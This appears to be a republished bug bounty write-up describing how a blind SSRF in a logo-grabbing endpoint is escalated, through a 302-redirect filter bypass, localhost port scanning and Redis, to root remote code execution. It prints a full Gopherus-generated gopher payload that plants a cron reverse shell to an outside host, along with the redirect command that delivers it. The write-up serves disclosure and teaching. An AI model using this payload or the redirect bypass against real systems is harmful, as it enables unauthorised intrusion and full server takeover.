I. Preface

The bug bounty program under which I found this vulnerability does not allow public disclosure, so I will not name the system involved. The program is one of the longest-running on HackerOne and pays some of the largest bounties, and there is a lot of hacker activity around it on HackerOne. This is a powerful company with a world-class security team, and a large number of security experts have tested it over the years, which makes the existence of this vulnerability even more surprising.

II. Investigation

For a large bug bounty program, I would normally enumerate subdomains to increase the attack surface, but in this case I focused on a single web target. Because I was looking at only one web application, I first used gau (https://github.com/lc/gau) to pull a list of URLs and parameters. I also looked for parameters hidden in the various JavaScript files and used ffuf (https://github.com/ffuf/ffuf) to do some directory fuzzing. These methods turned up some interesting parameters, but no weaknesses.
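As a rough illustration of the parameter-gathering step, the sketch below collects the unique query parameter names from a list of URLs like the one a URL-listing tool prints. The sample URLs and the function name `collect_params` are made up for illustration and do not come from the target.

```python
from urllib.parse import urlsplit, parse_qsl


def collect_params(urls):
    """Map each query parameter name to the set of paths it was seen on."""
    seen = {}
    for url in urls:
        parts = urlsplit(url.strip())
        for name, _value in parse_qsl(parts.query, keep_blank_values=True):
            seen.setdefault(name, set()).add(parts.path)
    return seen


# Hypothetical sample input, one URL per entry.
sample = [
    "http://site.example.com/xxx/logoGrabber?url=http://example.com",
    "http://site.example.com/search?q=test&page=2",
    "http://site.example.com/search?q=other",
]

for name, paths in sorted(collect_params(sample).items()):
    print(name, sorted(paths))
```

Parameters that take a URL as their value (such as `url` here) are the ones worth a closer look.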

Since the first approach found nothing, I tried another. I ran the Burp proxy in the background while exercising the various functions of the web application. Every request sent is stored in Burp, which makes it easy to review them all for anything interesting or potentially vulnerable. After testing the application's functionality, I browsed the requests stored in the proxy log and came across one similar to the following:

GET /xxx/logoGrabber?url=http://example.com
Host: site.example.com
...

It is a GET request with a url parameter. The response, shown below, contains the title and logo of the page at that URL:

{"responseTime":"99999ms","grabbedUrl":"http://example.com","urlInfo":{"pageTitle":"Example Title","pageLogo":"pagelogourl"}}

The request immediately interested me because it returned data about the URL. Whenever you encounter a request that returns information from a URL, it is worth testing for SSRF.
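To make the shape of this request and response concrete, here is a small sketch that builds the probe URL for a given target and pulls the interesting fields out of the JSON reply. The endpoint is the placeholder used in this article, and the helper names `build_probe_url` and `summarize` are my own for illustration.

```python
import json
from urllib.parse import urlencode

# Placeholder endpoint taken from the sample request in this article.
ENDPOINT = "http://site.example.com/xxx/logoGrabber"


def build_probe_url(target):
    """Return the logoGrabber URL that asks the server to fetch `target`."""
    return ENDPOINT + "?" + urlencode({"url": target})


def summarize(response_text):
    """Extract the fetched URL, page title and logo from a JSON response."""
    data = json.loads(response_text)
    info = data.get("urlInfo", {})
    return {
        "grabbed": data.get("grabbedUrl"),
        "title": info.get("pageTitle"),
        "logo": info.get("pageLogo"),
    }


sample_response = (
    '{"responseTime":"99999ms","grabbedUrl":"http://example.com",'
    '"urlInfo":{"pageTitle":"Example Title","pageLogo":"pagelogourl"}}'
)
print(build_probe_url("http://example.com"))
print(summarize(sample_response))
```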

III. Discovery of SSRF

My first attempt at SSRF failed. I could make the server interact with external hosts, but it was properly protected, so I could not reach any internal IP addresses.

Since internal IP addresses were out of reach, I decided to see whether I could reach any of the company's publicly known subdomains. I did some subdomain enumeration for the target and then tried every subdomain I found. In the end I got lucky: some sites that could not be reached publicly still returned data such as the page title.

Take one subdomain as an example (somecorpsite.example.com). When I tried to open http://somecorpsite.example.com in the browser, the request timed out. But when I submitted this request:

GET /xxx/logoGrabber?url=http://somecorpsite.example.com
Host: site.example.com
...

The response contains internal title and logo information:

{"responseTime":"9ms","grabbedUrl":"http://somecorpsite.example.com","urlInfo":{"pageTitle":"INTERNAL PAGE TITLE","pageLogo":"http://somecorpsite.example.com/logos/logo.png"}}
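The comparison described above (times out directly, but returns a title through the endpoint) can be written as a small check. This is only a sketch: the function name `is_internal_only` is hypothetical, and whether a host is directly reachable is passed in as a flag rather than measured.

```python
import json


def is_internal_only(direct_reachable, ssrf_response_text):
    """True when a host cannot be reached directly but the endpoint
    still returns a page title for it."""
    try:
        data = json.loads(ssrf_response_text)
    except json.JSONDecodeError:
        return False
    if not isinstance(data, dict):
        return False
    info = data.get("urlInfo") or {}
    return (not direct_reachable) and bool(info.get("pageTitle"))


sample_response = (
    '{"responseTime":"9ms","grabbedUrl":"http://somecorpsite.example.com",'
    '"urlInfo":{"pageTitle":"INTERNAL PAGE TITLE",'
    '"pageLogo":"http://somecorpsite.example.com/logos/logo.png"}}'
)
# The browser request timed out, so direct_reachable is False here.
print(is_internal_only(False, sample_response))
```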

So by pointing the request at an internal subdomain, I could read that site's title and logo, and I decided to submit the report as a blind SSRF. The internal titles contained nothing particularly sensitive, and no other page content was returned, so I expected it to be treated as a low-impact blind SSRF. I had no idea how to escalate it, so I reported it as it was. After some time, the report was accepted and triaged.

IV. RCE

About a month passed after my original report was triaged. I was excited about the triage, but I knew the impact was small and I probably would not get much of a reward for it. The SSRF was still there and had not been fixed, so I decided to do more research and try to escalate it. During that research I learned that the gopher protocol is an excellent way to escalate SSRF, and in some cases it can lead to full remote code execution. To test whether the gopher protocol was supported, I submitted a request similar to the following:

GET /xxx/logoGrabber?url=gopher://myburpcollaboratorurl
Host: site.example.com
...

Unfortunately, the request failed immediately with a server error. No request reached my Burp Collaborator, so it seemed the gopher protocol was not supported. While continuing to test, I read online that redirects are often a good way to bypass SSRF protections, so I decided to check whether the server follows redirects. To test this, I set up a Python HTTP server that redirects all GET traffic to my Burp Collaborator URL.

python3 302redirect.py port "http://mycollaboratorurl/"
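The source of 302redirect.py is not shown here. A minimal sketch of such a server, using only Python's standard `http.server` module, might look like the following; the function name `make_redirect_server` and its parameters are my own assumptions, not the original script.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_redirect_server(port, target, host="0.0.0.0"):
    """Build an HTTP server that answers every GET with a 302 to `target`."""

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Whatever path was requested, point the client at the target URL.
            self.send_response(302)
            self.send_header("Location", target)
            self.send_header("Content-Length", "0")
            self.end_headers()

    return HTTPServer((host, port), RedirectHandler)
```

To run it, call for example `make_redirect_server(8000, "http://mycollaboratorurl/").serve_forever()`, where port 8000 is an arbitrary choice. The target is passed through as-is, so any scheme can be placed in the Location header.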

Then I submitted the following request to see whether the redirected request would reach my Burp Collaborator:

GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: site.example.com
...

After submitting the request, I saw that the server followed the redirect and requested my Burp Collaborator URL, which confirmed that redirects are followed. Knowing that, I decided to try the gopher protocol again. Submitting a gopher payload directly in the request led straight to a server error, so this time I delivered it through the redirect. I set up the following to test whether gopher works through a redirect:

python3 302redirect.py port "gopher://mycollaboratorurl/"

Then I submitted the request again:

GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: site.example.com
...

To my surprise, it worked. The redirect was followed and I got a request in my Burp Collaborator. The server filters the gopher protocol in the submitted URL, but if the gopher URL arrives as a redirect from my own server, it bypasses the filter and the gopher payload is executed after the redirect. With gopher payloads working through a 302 redirect, I realized I could now also reach the internal IP addresses that had been filtered before, such as 127.0.0.1.
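How the server actually filters URLs is not known. One plausible reading of this behavior is that only the URL submitted in the request is validated, while the Location of a redirect is not. The sketch below illustrates that gap with a hypothetical validator (`is_allowed` and `check_chain` are made-up names): the first hop passes, and the redirect target would only be rejected if every hop were checked.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_allowed(url):
    """Hypothetical filter: allow only http(s) URLs to non-internal hosts."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname, not an IP literal. A real filter would also have to
        # resolve it and check the resulting address; omitted in this sketch.
        return True
    return not (addr.is_private or addr.is_loopback)


def check_chain(urls):
    """Validate every URL in a redirect chain, not only the first one."""
    return all(is_allowed(u) for u in urls)


chain = ["http://my302redirectserver/", "gopher://127.0.0.1:6379/_x"]
print(is_allowed(chain[0]))  # the submitted URL on its own
print(check_chain(chain))    # the full chain, including the redirect target
```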

Now that gopher payloads worked and could hit internal hosts, I had to find out which services I could interact with in order to escalate. After some searching, I found the tool Gopherus (https://github.com/tarunkant/Gopherus), which generates gopher payloads for escalating SSRF. It includes payloads for the following services:

MySQL (Port-3306)

FastCGI (Port-9000)

Memcached (Port-11211)

Redis (Port-6379)

Zabbix (Port-10050)

SMTP (Port-25)

To determine whether any of these ports were open on 127.0.0.1, I used the SSRF for port scanning. I had my web server 302-redirect to gopher://127.0.0.1:port and then submitted the request:

GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: site.example.com
...

I could tell open ports from closed ones by timing: if the port is closed, the request takes a long time to respond, and if the port is open, it responds quickly. Using this method, I checked all six ports listed above. One appeared to be open: port 6379 (Redis).

302redirect → gopher://127.0.0.1:3306 [Response time: 3000ms] - CLOSED
302redirect → gopher://127.0.0.1:9000 [Response time: 2500ms] - CLOSED
302redirect → gopher://127.0.0.1:6379 [Response time: 500ms] - OPEN
etc...
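The timing logic can be sketched as follows. The 1000 ms cut-off is an assumption chosen only because it separates the timings listed here; a real scan would need a threshold calibrated against the target. The helper names are hypothetical.

```python
# Service ports covered by the payload generator, as listed in this article.
GOPHERUS_PORTS = {
    3306: "MySQL",
    9000: "FastCGI",
    11211: "Memcached",
    6379: "Redis",
    10050: "Zabbix",
    25: "SMTP",
}


def redirect_target(port):
    """URL the 302 server should redirect to when probing `port`."""
    return f"gopher://127.0.0.1:{port}"


def classify(response_ms, threshold_ms=1000):
    """Fast responses suggest an open port, slow ones a closed port.
    The threshold is an assumed value, not one taken from the write-up."""
    return "OPEN" if response_ms < threshold_ms else "CLOSED"


# Response times reported in this article.
observed = {3306: 3000, 9000: 2500, 6379: 500}
for port, ms in observed.items():
    name = GOPHERUS_PORTS[port]
    print(f"{redirect_target(port)} [{ms}ms] {name}: {classify(ms)}")
```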

Everything looks good now. I seem to have everything I need:

The 302 redirect accepts the gopher protocol

I can attack localhost with gopher payloads

A potentially vulnerable service running on localhost has been identified

Using Gopherus, I generated a Redis reverse shell payload, which looks like this:

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
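To see what this payload actually sends to Redis, it can be URL-decoded and split back into commands. The sketch below does that with the standard library. It is a simplified reader, not a full Redis protocol parser: it trusts the `*<count>` array headers and ignores the `$<length>` prefixes, because the `$69` prefix does not match the value as printed here (presumably the listener address was replaced with x.x.x.x after the payload was generated).

```python
from urllib.parse import unquote_to_bytes

PAYLOAD = (
    "gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A"
    "%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A"
    "%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20"
    "/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A"
    "%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A"
    "%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A"
    "%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"
)


def gopher_to_bytes(url):
    """Return the raw bytes a gopher URL sends: everything after the
    one-character item type ('_' here), percent-decoded."""
    _, _, encoded = url.partition("/_")
    return unquote_to_bytes(encoded)


def split_redis_commands(raw):
    """Group CRLF-separated lines into commands using the '*<count>' headers."""
    lines = raw.split(b"\r\n")
    commands, i = [], 0
    while i < len(lines) and lines[i].startswith(b"*"):
        argc = int(lines[i][1:])
        i += 1
        args = []
        for _ in range(argc):
            i += 1  # skip the "$<length>" line
            args.append(lines[i].decode())
            i += 1
        commands.append(args)
    return commands


for cmd in split_redis_commands(gopher_to_bytes(PAYLOAD)):
    print(cmd)
```

Decoded, the payload is five Redis commands: `flushall`, a `set` whose value is a cron line that opens the reverse shell, two `config set` calls that point Redis's dump directory and file name, and `save` to write the file.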

If this payload executes successfully, my netcat listener will receive a reverse shell. I started the 302 server so that it redirects to the gopher payload:

python3 302redirect.py port "gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/x.x.x.x/1337%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2414%0D%0A/var/lib/redis%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A"

With my web server running, I also started a netcat listener on port 1337 to catch any incoming reverse shell. Then, at the moment of truth, I submitted the request:

GET /xxx/logoGrabber?url=http://my302redirectserver/
Host: site.example.com
...



Nothing. Nothing happened. I saw a request arrive at my redirect server, but no reverse shell came back to my netcat listener. I thought it was over and that I had nothing. I assumed my port scan result was a false positive and that Redis was not actually running on localhost. I accepted defeat and started closing everything down. My mouse was on the X button of the terminal running netcat, milliseconds away from clicking it. Then, about 5 minutes after the request (I really don't know why it took so long), I received a reverse shell. I'm glad I was still listening, otherwise I would never have known I had RCE.



I ran whoami to verify that I had RCE (I was root!), then immediately disconnected and updated my original report with the new information. The vulnerability was discovered and reported in May 2020 and has since been resolved. I ended up with a $15,000 bounty and some compliments from the company's security team.

Original link:

https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530
